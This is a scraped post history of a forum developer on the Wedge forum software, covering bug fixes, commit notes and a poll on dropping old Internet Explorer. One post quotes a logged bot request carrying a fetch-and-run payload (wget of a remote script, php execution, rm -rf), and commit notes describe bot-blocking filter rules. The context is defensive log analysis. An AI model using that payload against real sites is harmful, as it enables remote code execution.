Show Posts
This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.
Messages - Nao
1171
Bug reports / [Posting] Re: Wrong attachment is uploaded
« on March 9th, 2014, 08:13 PM »
Bump for @Dragooon.
This one's fucked up. Not only the plugin, but also the attachment system overall.
Tested on my local site...
- Dropped a file. Instead of uploading it, it just reverted to the regular system.
- Added a second file with the Attach selector. Removed it. Added a third.
As a result, after submitting, all 3 files were uploaded. :-/
Can anyone confirm on their local sites?
This one's fucked up. Not only the plugin, but also the attachment system overall.
Tested on my local site...
- Dropped a file. Instead of uploading it, it just reverted to the regular system.
- Added a second file with the Attach selector. Removed it. Added a third.
As a result, after submitting, all 3 files were uploaded. :-/
Can anyone confirm on their local sites?
1172
Features / Re: Poll: dropping oldIE
« on March 9th, 2014, 11:47 AM »Web market share for Windows 2000
Web market share for Windows NT (<5, I guess.)
Both experienced an odd surge in May 2013. The surge for Windows NT is very suspicious, because it places its market share well above W2000's, even though 2000 is more recent, and was supported for much longer by Microsoft.
I tend not to trust NetMarketShare's data, especially when it comes to IE's market share (~58%, that is about 6 times the data I get for wedge.org on Google Analytics), but I'm also not 100% trusting of Google because they may be biased towards Chrome, and maybe they'll just "drop", "inadvertently", some requests made by old Windows OSes because they're more likely to use oldIE. (To be clear, none of the modern browsers work on old OSes, except for Opera 12 which AFAIK can work on Windows 98 with some tweaks and extra DLLs. But I don't think anyone with W98 *today* would be sufficiently computer-aware to use anything other than IE4 or something...)
What do you think, guys..?
I'm only asking because yesterday I committed an extra set of Bad Behavior rules that actually block any requests made from Windows 95, 98, ME and NT. Windows 2000 is supposed to be in the lot (according to BB's FAQ), but I don't think it is (I would have considered removing it otherwise.)
1173
Archived fixes / Re: Installation problem
« on March 9th, 2014, 08:46 AM »
How exactly is this topic 'fixed' and 'archived' when I didn't get a chance to participate in the last page of debates and there is clearly a fault in Wedge that prevents it from working out of the box on some setups..?
Seriously I need to get more info...
Seriously I need to get more info...
1174
Archived fixes / Re: Pictures overlap the side bar
« on March 8th, 2014, 08:15 PM »
You may have noticed this new bug, apparent on the New Revs topic itself... My gravatar is shown out of proportion.
Why so? And why post it here..?
Basically, the avatar is shown with an img tag, and a height param of 50.
Since only the height is set, width is 'auto' in this case.
max-width: 100% doesn't have any effect.
However, my fix forces height to 'auto', and it overrides the height param. (For the height param to be prioritized, it would need to be done via a style param instead.)
I'm not sure how best to handle this...
Perhaps by setting height: auto only on img[width], which will ensure that this gravatar won't be touched.
Any better solution..? Because this one isn't gonna work in IE6... Oh, what did I just say? Who cares :P
Yep... Confirmed fixed.
Why so? And why post it here..?
Basically, the avatar is shown with an img tag, and a height param of 50.
Since only the height is set, width is 'auto' in this case.
max-width: 100% doesn't have any effect.
However, my fix forces height to 'auto', and it overrides the height param. (For the height param to be prioritized, it would need to be done via a style param instead.)
I'm not sure how best to handle this...
Perhaps by setting height: auto only on img[width], which will ensure that this gravatar won't be touched.
Any better solution..? Because this one isn't gonna work in IE6... Oh, what did I just say? Who cares :P
Posted: March 8th, 2014, 08:12 PM
Yep... Confirmed fixed.
1175
Features / Re: Poll: dropping oldIE
« on March 8th, 2014, 07:06 PM »
A random scrape, man! The more posts you have, the likelier to be targeted!
1176
Features / Re: New revs
« on March 8th, 2014, 06:56 PM »
[Commit revision 984b767]
Author: Nao
Date: Sat, 08 Mar 2014 18:48:54 +0100
Stats: 1 file changed; +1 (insertion), -1 (deletion)
[Commit revision 787ef77]
Author: Nao
Date: Sat, 08 Mar 2014 18:55:57 +0100
Stats: 2 files changed; +34 (insertions), -16 (deletions)
Author: NaoDate: Sat, 08 Mar 2014 18:48:54 +0100
Stats: 1 file changed; +1 (insertion), -1 (deletion)
- Don't show IE6/IE7 deprecation warnings to known bots. They might actually cache them... (Load.php)
[Commit revision 787ef77]
Author: NaoDate: Sat, 08 Mar 2014 18:55:57 +0100
Stats: 2 files changed; +34 (insertions), -16 (deletions)
- Updated Bad Behavior filters to version 2.2.15. It's just an extra test. Also updated credit URLs to remove the www subdomain. (Security.php, Security.english.php)
- Went through all existing filters and compared them to the latest Bad Behavior, which was painful because they weren't in the same order. As a result:
- Fixed 'PMAfind' into 'PMAFind', which is what BB uses. (Pete bug.)
- Added a mention about an entry that was removed by BB without warning, but seems harmful enough to keep.
- Removed 'Mozilla ', which according to BB is used by the Google AdSense bot, which we don't want to cross...
- Added back some entries that Pete decided not to import from BB 2.2.8 (see August 20, 2012 commit):
- Restored 'Mozilla/0', probably an oversight.
- Ensured that '<sc' is tested against everywhere in the string, not just at the start. If BB does it that way, it probably has a reason to. Opening space, maybe..?
- Windows 3.x, 9x, ME, as well as IE 1.0 and Mozilla Firebird (pre-Firefox) have no reason to be used by anyone in 2014, so they should be banned because they're probably bots (I can concur.)
- If needed, you can re-allow old OSes and old browsers via a new hidden setting. Just set $settings['allow_jurassic_crap'] to 1. Yeah, I make up funny variable names.
- Note: this commit is mostly about me taking ownership of one of Pete's old jobs.. But I don't know if the job was about implementing BB, or saying one knows better than BB. Because I really can't say that.
1177
Features / Re: Poll: dropping oldIE
« on March 8th, 2014, 01:21 PM »
So... I analyzed my visit logs for the last couple of days. There are very few IE6 and IE7 visits, but still a few hundreds.
Out of these, about 90% are pure bullshit.
Let's see...
IE7 - Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)
"InfoPath" is supposed to be a bot, to begin with...
But look at that beautiful request:
/profile/MultiformeIngegno/%22%20data-dot=%221%22%20class=%22url//images/stories/racrew.php?cmd=cd%20/tmp%20;wget%20http://picasa.com.rnt.ca/ec.txt%20;%20php%20ec.txt%20;%20rm%20-rf%20ec.txt
From what I could gather, it's a scriptkiddie's bot to exploit an old Joomla vulnerability. Yay...
Me loves that kind of wasted bandwidth. (Heck, even the script itself seems to no longer be hosted, so even if there was a vuln, it would still do nothing to it.)
I'm tempted to send a 403 to any query that holds a 'cmd=' variable in its query string. The only occurrence of 'cmd' as a variable in Wedge is an outgoing request to PayPal subscriptions. I don't think it would hurt.
Even "regular" IE6 user agents sometimes send some suspicious requests... What about "/.svn/entries" in the URL, eh..? Or guestbook2.htm? These are both IPs from Ukraine and Russia. (They may be in an internal crisis, but they both agree it's cool to bother every site in the world... :P)
Guests with a regular IE7 string trying to access ?action=unread, and who are nowhere to be found in the Wedge IP list, and even better, use a "direct allocation" IP address..? Very suspicious, too.
More importantly, Google, which is quite reliable when it comes to determining what a bot is, insists on telling me that I've only received two proper IE6 visits over the entire week (0.03% of all visits on the same period), and 11 visits for IE7. 15 visits for IE8, and 350 or something for IE11. So it's not blocking IE6 or IE7, it's just determining that most of the user agents claiming to be oldIE are full of shit, either because they've been busted as bots, or because, well, they're bots, and bots USUALLY don't download your JavaScript assets, especially not Google's..............
Anyway, all of this to say: I'm pretty confident that Google's stats are more correct than anything else I could try for.
Out of these, about 90% are pure bullshit.
Let's see...
IE7 - Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)
"InfoPath" is supposed to be a bot, to begin with...
But look at that beautiful request:
/profile/MultiformeIngegno/%22%20data-dot=%221%22%20class=%22url//images/stories/racrew.php?cmd=cd%20/tmp%20;wget%20http://picasa.com.rnt.ca/ec.txt%20;%20php%20ec.txt%20;%20rm%20-rf%20ec.txt
From what I could gather, it's a scriptkiddie's bot to exploit an old Joomla vulnerability. Yay...
Me loves that kind of wasted bandwidth. (Heck, even the script itself seems to no longer be hosted, so even if there was a vuln, it would still do nothing to it.)
I'm tempted to send a 403 to any query that holds a 'cmd=' variable in its query string. The only occurrence of 'cmd' as a variable in Wedge is an outgoing request to PayPal subscriptions. I don't think it would hurt.
Even "regular" IE6 user agents sometimes send some suspicious requests... What about "/.svn/entries" in the URL, eh..? Or guestbook2.htm? These are both IPs from Ukraine and Russia. (They may be in an internal crisis, but they both agree it's cool to bother every site in the world... :P)
Guests with a regular IE7 string trying to access ?action=unread, and who are nowhere to be found in the Wedge IP list, and even better, use a "direct allocation" IP address..? Very suspicious, too.
More importantly, Google, which is quite reliable when it comes to determining what a bot is, insists on telling me that I've only received two proper IE6 visits over the entire week (0.03% of all visits on the same period), and 11 visits for IE7. 15 visits for IE8, and 350 or something for IE11. So it's not blocking IE6 or IE7, it's just determining that most of the user agents claiming to be oldIE are full of shit, either because they've been busted as bots, or because, well, they're bots, and bots USUALLY don't download your JavaScript assets, especially not Google's..............
Anyway, all of this to say: I'm pretty confident that Google's stats are more correct than anything else I could try for.
1178
Archived fixes / Re: Pictures overlap the side bar
« on March 8th, 2014, 12:16 PM »
Okay... Fixed. Somehow. Should remember this for the future: when there's a behavior difference between wedge.org and another site, first thing to do is ask to disable plugins one by one...
In this case, it's due to Pin It. It's enclosing the items in an inline-block div, and the inline-block resets the max-width to the whole page. Doesn't make much sense to me... Anyway, changing this to a span (or replacing "inline-block" with "inline" in the plugin code) works, but I don't know why, and most importantly -- I don't know if it'll work cross-browser, too.
Can you try this, and keep me posted..? Then we can test on all browsers. It's important to me that it works.
BTW, your site loads very slowly mainly because it tends to accumulate JS scripts... Facebook Likes, Twitter retweets, Pin It stuff, and so on... I'm not sure why you're so adamant on keeping your site a secret, and hiding it from bots as well (meta noindex), while at the same time trying every possible way to make it visible on social networks...?!
In this case, it's due to Pin It. It's enclosing the items in an inline-block div, and the inline-block resets the max-width to the whole page. Doesn't make much sense to me... Anyway, changing this to a span (or replacing "inline-block" with "inline" in the plugin code) works, but I don't know why, and most importantly -- I don't know if it'll work cross-browser, too.
Can you try this, and keep me posted..? Then we can test on all browsers. It's important to me that it works.
BTW, your site loads very slowly mainly because it tends to accumulate JS scripts... Facebook Likes, Twitter retweets, Pin It stuff, and so on... I'm not sure why you're so adamant on keeping your site a secret, and hiding it from bots as well (meta noindex), while at the same time trying every possible way to make it visible on social networks...?!
1179
Archived fixes / Re: Pictures overlap the side bar
« on March 8th, 2014, 12:07 PM »
This is one of the strangest bugs I've had to deal with...
- Your site: max-width: 100% isn't respected in Firefox
- My site: it is, but flexbox creates an empty gap in the vertical space that was previously occupied by the unresized image.
All in all, it's definitely a Firefox bug. My code is clean. I haven't tested in IE (yet).
I just updated to Firefox 28 Beta, and the flexbox bug is fixed.
Also, I've noticed that your image is actually correctly sized -- UNTIL the page is loaded, at which point it resizes back to the original. EH..?!
So it's a JavaScript problem...
- Your site: max-width: 100% isn't respected in Firefox
- My site: it is, but flexbox creates an empty gap in the vertical space that was previously occupied by the unresized image.
All in all, it's definitely a Firefox bug. My code is clean. I haven't tested in IE (yet).
Posted: March 8th, 2014, 12:02 PM
I just updated to Firefox 28 Beta, and the flexbox bug is fixed.
Also, I've noticed that your image is actually correctly sized -- UNTIL the page is loaded, at which point it resizes back to the original. EH..?!
So it's a JavaScript problem...
1180
Archived fixes / Re: Pictures overlap the side bar
« on March 8th, 2014, 01:00 AM »
So... Still the same?
1181
Features / Re: Current processed Post id
« on March 8th, 2014, 01:00 AM »
Implemented today! :)
As for drafts, these should have a $type of 'post-draft'/'pm-draft' and a 'cache' ID of '30', it would make more sense, I think...!
Opinions?
As for drafts, these should have a $type of 'post-draft'/'pm-draft' and a 'cache' ID of '30', it would make more sense, I think...!
Opinions?
1182
The Pub / Re: Translating Wedge to Spanish - Need a little help
« on March 8th, 2014, 12:57 AM »Based on Notepad2, they are encoded as UTF-8 but I have my doubts. I you want to check, they files are hosted here.Quote from Pandos on March 5th, 2014, 04:56 PM Did you save it with UTF-8 decoding?
Regarding saving as UTF, please note that there are two options in Notepad2:
- Save as UTF-8 (regular, no headers)
- Save as UTF-8 with Signature (this is "UTF-8 with BOM".)
Perhaps I could try and remove BOM chars automatically from language files at cache time. I don't even know if it's realistic.
1183
Archived fixes / Re: Private Message code block does not scroll
« on March 8th, 2014, 12:52 AM »
I've never seen this happen, personally...
The PM skeleton, though, is bound to inherit post skeletons at one point. (Not my priority, though.)
It's, unfortunately, the least 'responsive' part of Wedge, as it's barely usable on mobile devices. I also noticed flexbox problems with code blocks in these. Check out line 220 of post.js, I think it could be fixed by applying this block to PM pages. I don't think it is, right now...
The PM skeleton, though, is bound to inherit post skeletons at one point. (Not my priority, though.)
It's, unfortunately, the least 'responsive' part of Wedge, as it's barely usable on mobile devices. I also noticed flexbox problems with code blocks in these. Check out line 220 of post.js, I think it could be fixed by applying this block to PM pages. I don't think it is, right now...
1184
Features / Re: New revs
« on March 8th, 2014, 12:48 AM »
[Commit revision 383b950]
Author: Nao
Date: Fri, 07 Mar 2014 23:31:50 +0100
Stats: 2 files changed; +6 (insertions), -4 (deletions)
[Commit revision 8148c25]
Author: Nao
Date: Fri, 07 Mar 2014 23:35:26 +0100
Stats: 1 file changed; +1 (insertion), -1 (deletion)
[Commit revision 1fd0f89]
Author: Nao
Date: Sat, 08 Mar 2014 00:48:00 +0100
Stats: 1 file changed; +3 (insertions), -3 (deletions)
Author: NaoDate: Fri, 07 Mar 2014 23:31:50 +0100
Stats: 2 files changed; +6 (insertions), -4 (deletions)
- Tweaked positions and transition timings to get a result closer to what used to be in CSS menus. (index.css)
- CSS menu rewrite was breaking sub-menus on mobile devices. (script.js)
[Commit revision 8148c25]
Author: NaoDate: Fri, 07 Mar 2014 23:35:26 +0100
Stats: 1 file changed; +1 (insertion), -1 (deletion)
- Added $type variable to the post_parse_bbc hook, if you need to know what kind of mess you're in. Made it rewritable, but it's not used later, so it's just for the principle. (Subs-BBC.php)
[Commit revision 1fd0f89]
Author: NaoDate: Sat, 08 Mar 2014 00:48:00 +0100
Stats: 1 file changed; +3 (insertions), -3 (deletions)
- Poll layout was slightly broken when a poll was closed in the last 2 days, because of the use of strong tags for the date. The solution for macro parameters is to use the 'htmlsafe::' prefix in your parameter, and then follow it by a call to westr::safe() on the string to be shown. It sounds a bit esoteric, sorry about that. (Display.template.php)
1185
Plugin Support / Re: Github plugin problem
« on March 7th, 2014, 11:37 PM »
The plugin detects line-breaks and separates lines into list items.
Does your git software automatically add line-breaks, or something..?
Does your git software automatically add line-breaks, or something..?